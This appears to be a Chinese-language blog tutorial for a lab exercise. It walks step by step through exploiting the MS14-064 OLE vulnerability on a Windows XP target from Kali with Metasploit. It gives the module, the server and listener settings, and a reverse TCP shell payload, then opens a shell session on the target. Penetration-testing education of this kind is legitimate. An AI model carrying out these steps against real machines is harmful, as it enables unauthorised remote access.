一、环境说明
渗透机:kali
靶机:Windows xp
二、实战步骤
1、进入msfconsole渗透测试平台
命令:msfconsole
![](https://i-blog.csdnimg.cn/blog_migrate/b32abe748cbdc9862667ddb52ff5d914.png)
2、搜索ms14-064模块
命令:search ms14-064
![](https://i-blog.csdnimg.cn/blog_migrate/070b6f7623ed1848413669ab1ce62aba.png)
3、使用exploit/windows/browser/ms14_064_ole_code_execution
命令:use exploit/windows/browser/ms14_064_ole_code_execution
![](https://i-blog.csdnimg.cn/blog_migrate/c43ce71976aa102ff730210c132768ca.png)
4、查看需要配置的参数
命令:show options
![](https://i-blog.csdnimg.cn/blog_migrate/077b5e064b1c64d8335ead481eeb57d1.png)
5、配置参数
命令:
set SRVHOST 192.168.X.XX (设置本地监听地址)
set SRVPORT 8080 (设置本地监听端口)
set URIPATH / (设置网站路径)
set PAYLOAD windows/shell/reverse_tcp (设置攻击模块)
set LHOST 192.168.X.XX (设置攻击机地址)
![](https://i-blog.csdnimg.cn/blog_migrate/6912c6d3cb370e3c4c24deeb5b4f1e13.png)
6、再次查看配置好之后的参数
命令:show options
![](https://i-blog.csdnimg.cn/blog_migrate/52607010b6dc9f944fd0aa551ed487d3.png)
7、输入攻击命令,进行漏洞模块攻击
命令:run(或者exploit)
![](https://i-blog.csdnimg.cn/blog_migrate/c8cdd6521f297e66c0e7c4ebdfe41aa1.png)
8、拿到步骤7中生成的url,在靶机中打开
![](https://i-blog.csdnimg.cn/blog_migrate/637b9e924e9ae67b172da9bad10f4838.png)
9、在渗透机查看活跃会话
命令:sessions -i
![](https://i-blog.csdnimg.cn/blog_migrate/cef22704fd4c12d9f0805d21ffca3933.png)
10、进行渗透
命令:sessions -i 1
![](https://i-blog.csdnimg.cn/blog_migrate/6bce66779bc53df0c97f4c50b6146cae.png)
11、渗透成功,输入ipconfig查看效果
![](https://i-blog.csdnimg.cn/blog_migrate/47fc4e7b38bb554555b1bd8dfe09a883.png)